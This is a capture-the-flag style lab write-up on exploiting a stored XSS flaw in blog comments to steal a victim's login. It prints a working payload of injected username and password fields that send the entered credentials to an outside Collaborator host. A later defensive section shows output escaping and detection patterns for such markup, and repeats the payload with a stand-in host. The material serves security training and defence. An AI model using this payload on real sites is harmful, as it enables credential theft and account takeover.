LAB 23 - Exploiting cross-site scripting to capture passwords
Initial instructions
This lab contains a stored XSS vulnerability in the blog comments function. A simulated victim user views all comments after they are posted. To solve the lab, exploit the vulnerability to exfiltrate the victim's username and password then use these credentials to log in to the victim's account.
To solve this lab I used the following payload.
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
We need to inject this payload into the Body while posting a comment.

Now let's go to the Collaborator and we will see an HTTP request. Here we have in plain text the Administrator password.

Let's log in to solve the lab.
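The comment body in this lab reaches the victim's browser as live markup, which is what lets injected form fields and an inline handler run. The following is an added example, not part of the original writeup or the lab: it shows the defensive side, encoding comment bodies on output and auditing already-stored comments for injected form fields and event handlers. The function names, rule ids, sample rows and the `collector.example` host are constructed for illustration.

```javascript
// Added example: hardened rendering plus an audit of already-stored comments.
// All names and sample data below are constructed for illustration.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can open a tag, attribute value or entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render a comment body as text only; no user-supplied markup survives.
function renderComment(body) {
  return '<p>' + escapeHtml(body) + '</p>';
}

// Markup that has no place in a plain-text comment field.
const RULES = [
  { id: 'form-field', re: /<\s*(input|form|textarea|select|button)\b/i },
  { id: 'password-input', re: /<\s*input\b[^>]*\btype\s*=\s*["']?password\b/i },
  { id: 'inline-event-handler', re: /<[^>]*\son[a-z]+\s*=/i },
  { id: 'script-tag', re: /<\s*script\b/i },
];

// Return the ids of all rules a stored comment body matches.
function auditComment(body) {
  return RULES.filter((rule) => rule.re.test(body)).map((rule) => rule.id);
}

// Audit every stored row and keep only the ones that need review.
function auditAll(comments) {
  return comments
    .map((c) => ({ id: c.id, findings: auditComment(c.body) }))
    .filter((r) => r.findings.length > 0);
}

// Constructed sample rows standing in for a comments table.
const storedComments = [
  { id: 1, body: 'Great post, thanks for the write-up!' },
  { id: 2, body: 'I think 3 < 5 & 5 > 3, right?' },
  { id: 3, body: '<input name=username id=username>\n' +
      '<input type=password name=password onchange="fetch(\'https://collector.example\')">' },
];

console.log(auditAll(storedComments));              // only row 3 is flagged
console.log(renderComment(storedComments[2].body)); // markup shown as inert text
```

The audit is a triage aid for comments stored before the fix and is easy to evade on its own; the output encoding in `renderComment` is the actual control.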
